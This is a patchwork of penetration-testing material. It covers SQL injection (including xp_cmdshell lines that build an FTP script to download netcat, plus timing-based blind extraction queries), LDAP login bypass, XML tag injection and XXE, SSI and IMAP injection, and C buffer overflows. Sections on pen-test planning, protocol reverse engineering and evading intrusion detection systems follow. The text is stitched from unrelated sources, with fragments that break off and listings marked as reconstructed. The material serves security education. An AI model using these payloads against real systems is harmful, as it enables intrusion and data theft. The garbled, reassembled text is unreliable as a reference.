OLE DB provider 'sqloledb' reported an error. The provider did not give any
information about the error.
Of course, the error message is not always available. If that is the case, we
can use the response time to understand what is going on: with a closed port,
the timeout (5 seconds in this example) will be consumed, whereas an open
port will return the result right away.
If xp_cmdshell is available, it can be used to upload an attack tool such as
netcat, e.g. by building an FTP script one line at a time:

exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
If FTP is not allowed by the firewall, we have a workaround that exploits the
Windows debugger, debug.exe, that is installed by default in all Windows
machines. Debug.exe is scriptable and is able to create an executable by
executing an appropriate script file. What we need to do is to convert the
executable into a debug script (which is a 100% ASCII file), upload it line by
line and finally call debug.exe on it. There are several tools that create such
debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by
toolcrypt.org). The queries to inject will therefore be the following:
....
There are tools that automate this process, most notably Bobcat, which runs
on Windows, and Sqlninja, which runs on Unix (See the tools at the bottom of
this page).
Not all is lost when the web application does not return any information --
such as descriptive error messages (cf. Blind SQL Injection). For example, it
might happen that one has access to the source code (e.g., because the web
application is based on open source software). Then, the pen tester can
exploit all the SQL injection vulnerabilities discovered offline in the web
application. Although an IPS might stop some of these attacks, the best way
would be to proceed as follows: develop and test the attacks in a testbed
created for that purpose, and then execute these attacks against the web
application being tested.
Other options for out of band attacks are described in Sample 4 above.
Blind SQL injection attacks
Alternatively, one may get lucky. That is, the attacker may assume that there
is a blind or out-of-band SQL injection vulnerability in a web application.
He will then select an attack vector (e.g., a web entry), use fuzz vectors
[1] against this channel, and watch the response. For example, if the web
application is looking for a book using a query like

select * from books where title = <text entered by the user>

then the penetration tester might enter the text: 'Bomba' OR 1=1- and if
data is not properly validated, the query will go through and return the
whole list of books. This is evidence that there is a SQL injection
vulnerability. The penetration tester might later play with the queries in
order to assess the criticality of this vulnerability.
Timing attacks
There is one more possibility for making a blind SQL injection attack when
there is not visible feedback from the application: by measuring the time that
the web application takes to answer a request. An attack of this sort is
described by Anley in ([2]) from where we take the next examples. A typical
approach uses the waitfor delay command: let's say that the attacker wants to
check if the 'pubs' sample database exists, he will simply inject the following
command:
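if exists (select * from pubs..pub_info) waitfor delay '0:0:5'

(This is Anley's well-known payload, restored here because the original listing is missing from this copy.)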
Depending on the time that the query takes to return, we will know the answer. In fact, what we have here is two things: a SQL injection vulnerability and a covert channel that allows the penetration tester to get one bit of information for each query. Hence, using several queries (as many as there are bits in the required information), the pen tester can extract any data that is in the database. Look at the following query:
declare @s varchar(8000)
declare @i int
select @s = db_name()
select @i = [some value]
Measuring the response time and using different values for @i, we
can deduce the length of the name of the current database, and then
start to extract the name itself with the following query:
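if (ascii(substring(@s, @byte, 1)) & (power(2, @bit))) > 0 waitfor delay '0:0:5'

(Again, this is the standard formulation of the technique, restored here because the original listing is absent from this copy.)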
This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the name of the current database is 1, and will return at once if it is 0. Nesting two cycles (one for @byte and one for @bit), we will be able to extract the whole piece of information.
However, it might happen that the waitfor command is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL injection attacks cannot be done; the pen tester only needs to come up with some time-consuming operation that is not filtered. For example:
declare @i int
select @i = 0
while @i < 0xaffff begin
select @i = @i + 1
end
The same timing approach can also be used to determine which version of SQL Server we are dealing with. Of course, we will leverage the built-in @@version variable. Consider the following query:
select @@version
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37
<snip>
The '2005' part of the string spans from the 22nd to the 25th character.
Therefore, one query to inject can be the following:
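if substring((select @@version),25,1) = '5' waitfor delay '0:0:5'

(This is the standard formulation of the check, restored here because the original listing is missing from this copy.)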
Such a query will wait 5 seconds if the 25th character of the @@version variable is '5', showing us that we are dealing with SQL Server 2005. If the query returns immediately, we are probably dealing with SQL Server 2000, and another similar query will help to clear all doubts.
Intelligent Injection
A web application could use LDAP in order to let a user log in with his own credentials or search for other users' information inside a corporate structure. What an attacker can achieve with this approach depends on how the LDAP filter is built, as the following scenarios show.
Search Parameters
The scenario: we have a web app using a search filter like the following one:

searchfilter="(cn="+user+")"

which is instantiated by an HTTP request such as:

http://www.example.com/ldapsearch?user=Tom

If the value 'Tom' is replaced with an asterisk:

http://www.example.com/ldapsearch?user=*

the filter becomes:

searchfilter="(cn=*)"

which matches every object in the LDAP tree.
Log On Credentials
If a web app uses a vulnerable login page script with an LDAP query for user credentials, it is possible to circumvent the check for user/password presence by injecting an always-true LDAP query (in a similar way to SQL and XPATH injection).
Let's suppose a web app uses a filter to match an LDAP user/password pair:

searchlogin= "(&(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))";

By injecting the following values:

user=*)(uid=*))(|(uid=*
pass=password

the filter becomes:

searchlogin="(&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))";
This is always true. This way the penetration tester will gain logged-in status as the first user in the LDAP tree.
Object Relational Mapping (ORM) Tool Vulnerabilities
ORM tools help expedite object-oriented development within the data access layer of software applications, including web applications. The benefits of using an ORM tool include quick generation of an object layer to communicate with a relational database, standardized code templates for these objects, and usually a set of safe functions to protect against SQL Injection attacks. ORM-generated objects can use SQL or, in some cases, a variant of SQL to perform CRUD (Create, Read, Update, Delete) operations on a database. It is possible, however, for a web application using ORM-generated objects to be vulnerable to SQL Injection attacks if it is developed in a way that does not block unsanitized input parameters. In other words, if the safe functions are bypassed and the developer uses custom functions that accept user input, it may be possible to execute a SQL injection attack.
If a tester has access to the source code for a web application, or can
discover vulnerabilities of an ORM tool and test web applications that use
this tool, there is a higher probability of successfully attacking the
application. Patterns to look for in code include:
Sending "' OR 1--" in the form where order date can be entered can yield
positive results.
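To see why, consider the query that such a custom function might build (a hypothetical example; the table and column names are assumed for illustration):

SELECT * FROM orders WHERE order_date = '' OR 1--'

Depending on the database's boolean and comment rules, the injected OR 1 makes the condition true for every row, while the -- neutralizes the trailing quote.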
ORM tools include Hibernate for Java, NHibernate for .NET, ActiveRecord
for Ruby on Rails and EZPDO for PHP.
XML Attacks
These attacks entail trying to inject an XML document into an application. For example:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
</users>
Suppose a new user is registered with the following values:
Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com
via the request:
http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&email=s4tan@hell.com
The application then builds the following node:
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
and appends it to the XML database, which becomes:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
Discovery
The first step in testing an application for the presence of an XML Injection vulnerability consists of trying to insert XML metacharacters.
Single quote: ' - When not sanitized, this character could throw an exception during XML parsing if the injected value is going to be part of an attribute value in a tag. As an example, let's suppose there is the following attribute:

<node attrib='$inputValue'/>

So, if a single quote is injected as the input value, the resulting document is malformed:

<node attrib='foo''/>

The same happens if a double quote is injected into a double-quoted attribute:

<node attrib="foo""/>
Angle brackets: > and < - By adding an open or closed angle bracket in a user input like the following:

Username = foo<

the application would build a node like:
<user>
<username>foo<</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
but the presence of an unclosed '<' will prevent the XML data from validating.
Comment tag: <!-- / --> - By injecting the start of a comment in the username:

Username = foo<!--

the application would build:

<user>
<username>foo<!--</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
For example:

<tagnode>&lt;</tagnode>

is well formed and valid, and represents the '<' ASCII character.
If '&' is not encoded itself as &amp;, it could be used to test for XML injection.
Username = &foo
<user>
<username>&foo</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
but as &foo doesn't have a final ';', and moreover the &foo; entity is defined nowhere, the XML is not valid.
CDATA begin/end tags: <![CDATA[ / ]]> - When a CDATA section is used, every character enclosed by it is not parsed by the XML parser. Often this is used when there are metacharacters inside a text node which are to be considered text values. For example, if there is the need to represent the string '<foo>' inside a text node, CDATA can be used as follows:
<node>
<![CDATA[<foo>]]>
</node>
If the application encloses user-supplied data in a CDATA section, such as:

<username><![CDATA[<$userName]]></username>

the tester could try to inject the end CDATA sequence ']]>' in order to try to invalidate the XML:
userName = ]]>
<username><![CDATA[]]>]]></username>
External Entity
Another test is related to the CDATA tag. When the XML document is processed, the CDATA delimiters are eliminated, so it is possible to smuggle in a script if the tag contents will be shown in the HTML page. Suppose there is a node containing text that will be displayed to the user. If this text can be modified, as in the following:
<html>
$HTMLCode
</html>
it is possible to avoid the input filter by inserting HTML text that uses the CDATA tag. For example, inserting the following value:
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>

we would get the following:

<html>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
</html>
In the analysis phase the CDATA delimiters are eliminated, inserting the following value into the HTML:
<script>alert('XSS')</script>
Entity: it's possible to define an entity using the DTD; entity names begin with '&' and end with ';'. It is also possible to specify a URL as an entity, which creates a potential XML External Entity (XXE) vulnerability. So, the last test to try is formed by the following strings:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
This test could crash the web server (on a Linux system), because we are trying to create an entity with an infinite number of characters. Other tests are the following:
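A typical payload of this kind (reconstructed from the standard XXE test set, since the entity definitions are truncated in this copy; exact file targets vary) is:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///dev/random">]>
<foo>&xxe;</foo>

The variants that follow usually point the entity at targets such as file:///etc/passwd or file:///etc/shadow instead.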
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
The goal of these tests is to obtain information about the structure of the XML database. If we analyze the resulting errors, we can find a lot of useful information about the adopted technology.
Tag Injection
Once the first step is accomplished, the tester will have some information
about XML structure, so it is possible to try to inject XML data and tags.
Suppose the tester supplies the following values:
Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com
In this case, the application will build a new node and append it to the XML database:
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail><userid>0</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
The resulting XML file is well formed, and it is likely that the userid tag will be considered with the latter value (0 = admin id). The only shortcoming is that the userid tag appears twice in the last user node, and an XML file is often associated with a schema or a DTD. Let's suppose now that the XML structure has the following DTD:
<!DOCTYPE users [
<!ELEMENT user (username,password,userid,mail+)>
<!ELEMENT username (#PCDATA)>
<!ELEMENT password (#PCDATA)>
<!ELEMENT userid (#PCDATA)>
<!ELEMENT mail (#PCDATA)>
]>
If the tester can control some values for nodes enclosing the userid tag (as in this example), by injecting a comment start/end sequence like the following:

Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><userid>0</userid><mail>s4tan@hell.com
The XML database file will be:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<!--
</password>
<userid>500</userid>
<mail>-->
<userid>0</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
This way, the original userid tag will be commented out and the injected one will be parsed in compliance with the DTD rules. The result is that user 'tony' will be logged in with userid=0 (which could be an administrator uid).
Server Side Vulnerabilities
Vulnerabilities occur where Web servers give to the developer the possibility
of adding small pieces of dynamic code inside static HTML pages, without
having to play with full-fledged server-side or client-side languages. This
feature is adopted by the Server-Side Includes (SSI), a very simple extension
that can enable an attacker to inject code into HTML pages, or even perform
remote code execution.
Server-Side Includes are directives that the web server parses before serving the page to the user. They represent an alternative to writing CGI programs or embedding code using server-side scripting languages when only very simple tasks need to be performed. Common SSI implementations provide commands to include external files, to set and print web server CGI environment variables, and to execute external CGI scripts or system commands.
For example, a page can include <!--#echo var="DATE_LOCAL" --> to print out the current time.
Then, if the web server's SSI support is enabled, the server will parse these directives, whether in the body or in the headers. In the default configuration, most web servers don't allow the use of the exec directive to execute system commands.
As in every bad input validation situation, problems arise when the user of
a web application is allowed to provide data that's going to make the
application or the web server itself behave in an unforeseen manner.
Talking about SSI injection, the attacker could provide input that, if inserted
by the application (or maybe directly by the server) into a dynamically
generated page, would be parsed as SSI directives.
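A classic probe at this point (a standard SSI test string, shown here as an illustration; whether it executes depends on the server's configuration) is:

<!--#exec cmd="ls" -->

If the command output appears in the returned page, the input is being parsed as an SSI directive.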
Having access to the application source code we can quite easily find out:
1. If SSI directives are used; if they are, then the web server is going
to have SSI support enabled, making SSI injection at least a
potential issue to investigate;
This threat affects all applications that communicate with mail servers
(IMAP/SMTP), generally webmail applications.
Information leaks
Relay/SPAM
It is important to note that the requests being sent should match the technology being tested. Sending SQL injection strings for Microsoft SQL Server when a MySQL server is being used will result in false positive responses. In this case, sending malicious IMAP commands is the modus operandi, since IMAP is the underlying protocol being tested.
Once the tester has identified vulnerable parameters and has analyzed the
context in which they are executed, the next stage is exploiting the
functionality.
http://<webmail>/read_email.php?message_id=4791
???? FETCH 4791 BODY[HEADER]
V100 CAPABILITY
Stack overflows occur when variable-size data is copied into fixed-length buffers located on the program stack without any bounds checking. Vulnerabilities of this class are generally considered to be of high severity, since exploitation would mostly permit arbitrary code execution or Denial of Service. Rarely found on interpreted platforms, code written in C and similar languages is often riddled with instances of this vulnerability. An extract from the buffer overflow section of the OWASP Guide 2.0 states that:
.NET as long as /unsafe or unmanaged code is not invoked (such as the use of
P/Invoke or COM Interop)
Consider the following example:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buff[20];
    printf("copying into buffer");
    strcpy(buff, argv[1]); /* no bounds check: an argument longer than 20 bytes overflows buff */
    return 0;
}
When reviewing code for stack overflows, it is advisable to search for calls to insecure library functions like gets(), strcpy() and strcat(), which do not validate the length of source strings and blindly copy data into fixed-size buffers.
void log_create(int severity, char *inpt)
{
    char b[1024];
    if (severity == 1)
    {
        strcat(b, "Error occurred on");
        strcat(b, ":");
        strcat(b, inpt);
        FILE *fd = fopen("logfile.log", "a");
        fprintf(fd, "%s", b);
        fclose(fd);
    }
    ......
}
From the above, the line strcat(b, inpt) will result in a stack overflow if inpt exceeds 1024 bytes. Not only does this demonstrate an insecure usage of strcat, it also shows how important it is to examine the length of strings referenced by a character pointer passed as an argument to a function; in this case, the length of the string referenced by char *inpt. Therefore it is always a good idea to trace back the source of function arguments and ascertain string lengths while reviewing code.
Usage of the relatively safer strncpy() can also lead to stack overflows since it
only restricts the number of bytes copied into the destination buffer. If the size
argument that is used to accomplish this is generated dynamically based on
user input or calculated inaccurately within loops, it is possible to overflow
stack buffers. For example:

char dest[40];
size = strlen(source) + 1;
strncpy(dest, source, size); /* size is derived from the source string, not from sizeof(dest) */
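A safer pattern (a minimal sketch; the key points are bounding the copy by the destination and terminating explicitly, since strncpy does not guarantee a null terminator):

char dest[40];
strncpy(dest, source, sizeof(dest) - 1); /* bound tied to the destination buffer */
dest[sizeof(dest) - 1] = '\0'; /* ensure termination even when source is too long */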
Vulnerabilities can also appear in URL and address parsing code. In such cases, a function like memccpy() is usually employed, which copies data from the source into a destination buffer until a specified character is encountered. Consider the function:

void func(char *path)
{
    char servaddr[40];
    memccpy(servaddr, path, '\\', strlen(path)); /* bound follows the source, not sizeof(servaddr) */
}
In this case, the information contained in path could be longer than 40 bytes before a '\' is encountered; if so, it will cause a stack overflow. A similar vulnerability was located in the Windows RPCSS subsystem (MS03-026). The vulnerable code copied server names from UNC paths into a fixed-size buffer until a '\' was encountered. The length of the server name in this case was controllable by users.
Apart from manually reviewing code for stack overflows, static code analysis tools can also be of great assistance. Although they tend to generate a lot of false positives and may locate only a portion of the defects, they certainly help in reducing the overhead associated with finding low-hanging fruit, like strcpy() and sprintf() bugs. A variety of tools like RATS, Flawfinder and ITS4 are available for analyzing C-style languages.
Reverse Engineering And
Penetration Testing
Much has been written about various tools and technical methods for running
network penetration tests or pen tests. However running an effective and
successful pen test requires some amount of technical management effort and
planning to ensure that the test is successfully architected and executed. Below are
10 useful steps to consider and implement for your next network penetration test
that will wow your team!
1. Comprehensive network assessment
A typical pen test, at the simplest level, tests the company's network and systems from the outside (external to the network) and optionally from the inside (internal to the network). Many companies choose to stick with the external assessment only.
A good comprehensive pen test approach is to have an external test together with
an internal test and explore what internal vulnerabilities can be exploited. This
external-to-internal pivot approach provides good visibility into the effectiveness
of your layered security program. Can an external phishing attempt on a single user
result in a pivot all the way through to administrator privileged access of a high
value internal restricted server? Which layers in your security program were
successful in blocking the attack?
2. Plan and structure the tests for effective results
Treat a pen test as a project just as you would a technical system rollout. Obtain
project management resources if possible and allocate dedicated information
security and IT time and effort.
3. Ensure adequate time for upfront planning
Even with the right resources dedicated to the project, a well-structured pen test requires some amount of upfront time to plan out the details of the test, align test goals with management and the pen test team, and review and provide all the required details to the pen test team. Pay special attention to the pen test team's pretest request for information. If incorrect IP addresses are provided, some of the systems or IP ranges will be missing test coverage.
Protocol Reverse Engineering (PRE) is the process of extracting the structure, attributes, and data from a network protocol implementation without access to its specification; in other words, formal semantic documentation of the protocol specification is not available.
For the purposes of Computer Network Defense (CND) and incident response,
the protocol's specification is most commonly used to support two goals: the
construction of network signatures and protocol decoders. Protocol decoders
can be a forensic gold mine if packet captures are available to analysts, but
often this is not the case: organizations rarely appreciate the intelligence
provided by protocol decoders and often lack a platform on which to deploy
them. There's a common obstacle, however, to building both signatures and
decoders: the perceived enormity of the task of PRE.
The Errant state is important to call out because some clients will behave
differently if an unexpected condition is encountered. Remember that in the
case of trojan / backdoor clients, the adversary is making a number of
assumptions about the executing environment. The most common error
condition I see is when a trojan cannot reach the server due to some intentional
or incidental access failure. Behaviors in this condition range from the client
becoming extremely verbose in its retry attempts, to extended shutdown modes.
The unfortunate truth is that automated PRE is largely academic for now, and
circumstances where necessary data is embedded in a complex protocol with
bad or "proprietary" documentation do occur. How, then, could a mere mortal
analyst possibly accomplish this task? My answer is "we don't." We let the
objectives of our output determine what we get out of PRE, and when our job
is finished. Again, our objectives are construction of protocol decoders and
network signatures available as quickly as possible. In agreement with these
objectives, it is wise to follow a few principles when performing PRE, which
you will see demonstrated in some of the forthcoming articles on PRE
techniques.
Signature creation can also fall victim to this mentality. Though PRE may have identified the role, value, nature, or range of only a tiny portion of the protocol, and this may be known to be accurate only for a limited set of circumstances, codifying it in a signature is still valuable if it can yield hits with a manageable false positive (FP) rate.
Analysts must let their questions about a protocol guide their reverse
engineering. In practice this philosophy is often manifest in a recursive reverse
engineering - detection loop. Partial protocol decoders raise questions about
particular aspects of a protocol that guide reverse engineering. False positives
and false negatives in signatures which inhibit detection serve as requirements
for further PRE. Think of this as the software engineering "spiral" development
model, with the realities of network activity turning into prioritized questions
by analysts using existing decoders and signatures, which become requirements
for PRE that result in incrementally improved decoders and signatures, and so on.
Many protocols can exhibit a huge range of behaviors depending on how the
client or server is configured. Sometimes this is as simple as a text file
accompanying a binary, sometimes it's easily compiled into the code by a
weaponizer (Poison Ivy comes to mind here), and sometimes it requires a
source code rewrite. Just remember: ALL attributes of ALL protocols are
configurable at some level. Attempting to capture all of these conditions in a
signature or decoder becomes an exercise in futility at one point or another.
Analysts should use their heads, and ask themselves a few questions.
How is the protocol going to operate with the information I have in-
hand?
How will the protocol operate successfully in my environment?
What likely assumptions is the adversary going to make, based on
common sense, or other intelligence available from previous
intrusion attempts in the same campaign?
What structures in the binary do functions seem to access that will
change the protocol's attributes?
Reverse Engineering Intrusion
Detection Systems
Intrusion Detection Networks (IDNs) constitute a primary element in current cyber defense systems. IDNs are composed of different nodes distributed among a network infrastructure, performing functions such as local detection (mostly by Intrusion Detection Systems (IDSs)), information sharing with other nodes in the IDN, and aggregation and correlation of data from different sources. Overall, they are able to detect distributed attacks taking place at large scale or in different parts of the network simultaneously.
Detection paradigms and architectures have also evolved to cope with the
requirements of complex network infrastructures. Rather than stand-alone
components strategically placed to protect a complete network or system, the
current trend is to rely on a distributed network of detection nodes. Intrusion
Detection Networks (IDN) are composed of different IDS nodes distributed
among a network performing local detection and sharing information with other
nodes in the IDN. One of the major advantages of IDNs is that, because the
detection functions are distributed across different network locations, so is the
workload required for each function.
IDNs attempt to solve this problem by distributing the tasks among different
nodes. Depending on their role in the network, some nodes gather local data
and send it to another node, probably with more resources, who correlates the
data and performs actual detection. This separation of duties makes IDNs a
suitable solution for distributed systems, including mobile ad hoc networks
(MANETs), where there are no central nodes and every host must collaborate
to ensure proper network behavior. IDNs are also used across geographically separated networks to allow different entities to collaborate and mitigate large-scale attacks [Bye et al., 2010]. Current attacks are capable of simultaneously infecting various networks or incorporating evasion techniques to pass undetected [Fogla and Lee, 2006]. Moreover, many zero-day attacks simultaneously target a huge number of systems worldwide, leaving little time to patch other networks. Thus, to prevent threats from propagating through different domains, collaboration between different IDNs is essential.
Since they are key elements of most organizations' cyberdefense systems, IDSs
often become themselves the target of attacks aimed at undermining their
detection capabilities. This may result in the degradation of the second
property evaluated by the Common Criteria, which states that countermeasures
must be correct. Actually, when attacking a system, the adversary's first goal is to degrade the effectiveness of the cyber defenses, thus making the countermeasures inappropriate. In the case of IDNs, attackers may use common network attacks to degrade the detection accuracy.
1. The decoder receives pieces of raw audit data from the audit data
collectors and transforms each of these pieces into data that the
preprocessor can handle.
2. The preprocessor extracts features from the raw data. It receives the
pieces of data transformed by the decoder, analyzes them to
determine which pieces depend on each other and treats dependent
pieces in such a way that they can be later scrutinized by the
detection engine. A typical preprocessor widely used in network-
based IDSs is the TCP preprocessor, whose main task is to compose
session flows from a given set of TCP segments (reordering
fragments, assembling them, etc). Currently, sophisticated
preprocessors are able to perform detection tasks supplementing
those performed by the detection engine.
3. The detection engine receives the data treated by the preprocessor
and examines it searching for intrusions. If an intrusion is found, the
detection engine requests the alert module to raise an alert.
1. Regarding the source of the audit data, an IDS can be network based
or host based:
Host IDSs (HIDSs): these analyze local data on the devices. Most of them analyze the sequence of system calls of the programs running on the device. Within these sequences, some HIDSs also analyze system call arguments, memory registers, stack states, system logs, user behaviors, etc.
(b) Active IDSs: apart from raising an alert, the IDS tries to neutralize the malicious data by executing a predefined action. Some authors refer to active IDSs as Intrusion Prevention Systems (IPSs).
2. Regarding the timing of the detection process, IDSs can be real time
or non-real time.
Misuse detection looks for intrusive evidence in the monitored events using
previous knowledge from known attacks and malicious activity. The most
common approach for misuse detection is to compare the monitored events
with intrusive patterns stored in a database. These stored patterns are called
signatures, and misuse detection is often called signature-based detection. For
example, Snort is a NIDS which contains a huge number of publicly available
signatures. The signatures follow a specific format, and allow for a deep
inspection of the network packets at network (IP protocol), transport (TCP and
UDP protocols) and application layer (protocols such as HTTP, FTP, SMTP,
etc.).
Misuse detection works well for known vulnerabilities and attacks. Indeed, it has low false positive rates, because if an activity matches a signature or follows a known attack path, it is very likely that the activity actually has malicious intentions. However, misuse detection is not able to detect zero-day attacks. These attacks do not have an associated signature in the IDS, either because they have been discovered recently and the signatures have not been published yet, or because the IDS has not been updated with the new required signatures.
Anomaly Detection
Anomaly detectors compare monitored activity with a predetermined model of normality to detect intrusions. These systems compute the model of normality by a learning process that is usually done offline, i.e., before deployment, although recent approaches suggest the use of online training to update the model as new normal activities are observed. The monitored activity can be network traffic, service requests, packet headers, data payloads, etc. During the learning process, the system analyzes a set of normal data and computes the normal model. Afterwards, any activity that does not fit the normal model is considered a potential intrusion.
Classification algorithms build classifiers from a training data set that are used to classify events at detection time. Given a set of n samples X = {X1, ..., Xn}, where each sample Xi is composed of j features (F1, ..., Fj), a classification algorithm generates a classifier that, for each new trace provided, returns its estimated class Ci from the set of classes C = {C1, ..., Ck}.
Networks And Architecture
A large-scale coordinated attack targets or utilizes a large number of hosts that are distributed over different administrative domains, and probably in different geographical areas. These attacks have the property of targeting multiple networks or sites simultaneously, and may use evasion techniques to stealthily compromise each single network. For example, an attacker may slow down the scan of one single host by decreasing the frequency of packets sent to this host. Meanwhile, it can use the time between packets to scan hosts in other networks. The main characteristic of large-scale attacks is that they usually target multiple hosts from either a single host or from many hosts. That is, the attack is distributed among various hosts.
IDNs are used in many scenarios, from collaborative domains, where different entities share information to detect global attacks, to local wireless networks composed of sensors, such as Mobile Ad-hoc Networks (MANETs). In both cases, the IDN is composed of multiple nodes distributed over the network, where each node communicates with one or many other nodes. Depending on how nodes are connected and what their responsibilities or roles within the network are, the architecture of an IDN can be centralized, hierarchical, or distributed.
1. Learning the normal profile used by the NIDS. With such knowledge, the adversary can use the NIDS learning algorithm and a set of normal traces to construct a statistical normal profile similar to the one used by the NIDS.
The benefits of ML are manifold. First, ML algorithms are relatively easy to use and do not require much understanding of the internals of the algorithms. Tools such as RapidMiner and WEKA permit users to set up the algorithms in a black-box fashion by just providing the input dataset. Second, ML algorithms are fast and provide good results in terms of efficiency. The detection is often very efficient and consumes few resources. This is a rather important aspect for detecting intrusions in real time, especially in constrained scenarios such as MANETs. Third, ML algorithms have been widely studied in the field of intrusion detection, and provide good results in terms of detection and false positive rates. At first sight, these strengths make ML a suitable and helpful solution for intrusion detection. However, the use of ML for intrusion detection is flawed, as we shall see.
This taxonomy classifies the attacks regarding three aspects: the Influence, the
Specificity and the Security Violation.
2. High cost of errors, i.e., the need to achieve a high detection rate while keeping a low false alarm rate. In other areas, an error may mean spam arriving in a client's email account or a missed potential client; a successful attack on a system, however, may have far more serious effects.
3. Semantic gap, i.e., the problem of providing security administrators with a good understanding of the alarms. ML algorithms are able to discern between classes. However, classical algorithms cannot explain why a given instance has been classified into its related class. Thus, a system administrator who wants to know what happened when analyzing an alert does not have the extra information that is usually needed.
Taxonomy Of Attacks
Attacks are usually classified regarding the goal of the adversary, which
results in different consequences:
1. Evasion, where an attack is carefully modified so that the IDS is not able to detect it. These are the most common attacks studied in the literature; blending and mimicry techniques are examples of evasion.
2. Over-stimulation, where the IDS is fed a large number of attack patterns to overwhelm analysts and security operators. For example, Mucus is an IDS stimulation tool that generates packets that purposely match the signatures of Snort to generate a large number of detection alerts.
Reverse engineering comes into play at this point: the engineer gathers information about the internals of the IDS by stimulating it with chosen input patterns and observing the response. The common approach is to perform query-response analysis, for example to discover the signatures used by the IDS.
Adversarial Model
In the analysis of attacks and countermeasures against a system, it is important
to establish the capabilities assumed for an adversary. Indeed, depending on
these capabilities, different procedures are established in the design of
countermeasures, which is critical in order to avoid spending unnecessary
resources. Since intrusion detection systems have only been analyzed in
adversarial environments very recently, there is a lack of widely accepted
adversarial models. Despite this, most works in this area assume an adversary
with, at least, the capabilities described next. The attacks presented in this
work assume that the adversary has knowledge about the following
information:
1. The distribution of the training data used by the IDS. This does not mean that the adversary has the same training dataset, but she must know the distribution and characteristics such as the protocol used, type of traces, normal contents, common patterns, etc.
Both the distribution and feature construction method may be kept secret in
many cases. However, from the security point of view, this possibility cannot
be underestimated, and the security of the system should not reside in the
obscurity of its implementation.
Reverse Engineering e-Commerce
Websites And Applications
Order Management
Coupon and Reward Management
Payment Gateway Integration, and
Content Management System Integration
Order Management Flaws
Order Management flaws consist of misusing the order placement process:
the bad content model, in which case the anomaly score is incremented by 5. The anomaly score of a packet is obtained by dividing the count by the total number of n-grams processed. Note that the use of bad content models makes it possible for anomaly scores to be greater than 1. With this semi-supervised procedure, already known attacks are taken into account, making Anagram more efficient. Randomization makes reverse engineering attacks against Anagram more difficult: a random mask with 3 sets is used, and incoming packets are partitioned into 3 chunks by applying a randomly generated mask. Such a mask consists of contiguous strings of 0s, 1s or 2s. Anagram requires that each string be at least 10 bytes long in order to keep the n-gram structure of the packets.
The mask is applied to the payload of a packet to assign each block to one of the three possible sets. Each resulting set is treated by Anagram as an independent packet formed by the concatenation of its blocks, and the sets are tested separately, thus obtaining different anomaly scores. The highest of these scores is the one given as the anomaly score of the original packet. If this anomaly score exceeds a predetermined threshold, the packet is tagged as "anomalous"; otherwise it is considered "normal".
The random mask applied in the detection process is kept secret. Consequently,
an attacker does not know how the different parts of a packet will be
processed in the detection process and, therefore, does not know where normal
padding should be added in order to achieve an acceptable ratio of unseen n-
grams.
By using randomization, the attacker will not know exactly how each packet will be processed and, therefore, where to put the padding to evade detection.
Attacking A Randomized Anagram
